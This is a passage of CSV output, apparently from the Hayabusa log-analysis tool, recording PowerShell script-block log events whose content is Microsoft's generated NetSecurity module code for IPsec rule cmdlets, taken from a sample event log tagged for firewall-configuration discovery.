($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.M",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"anagement.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 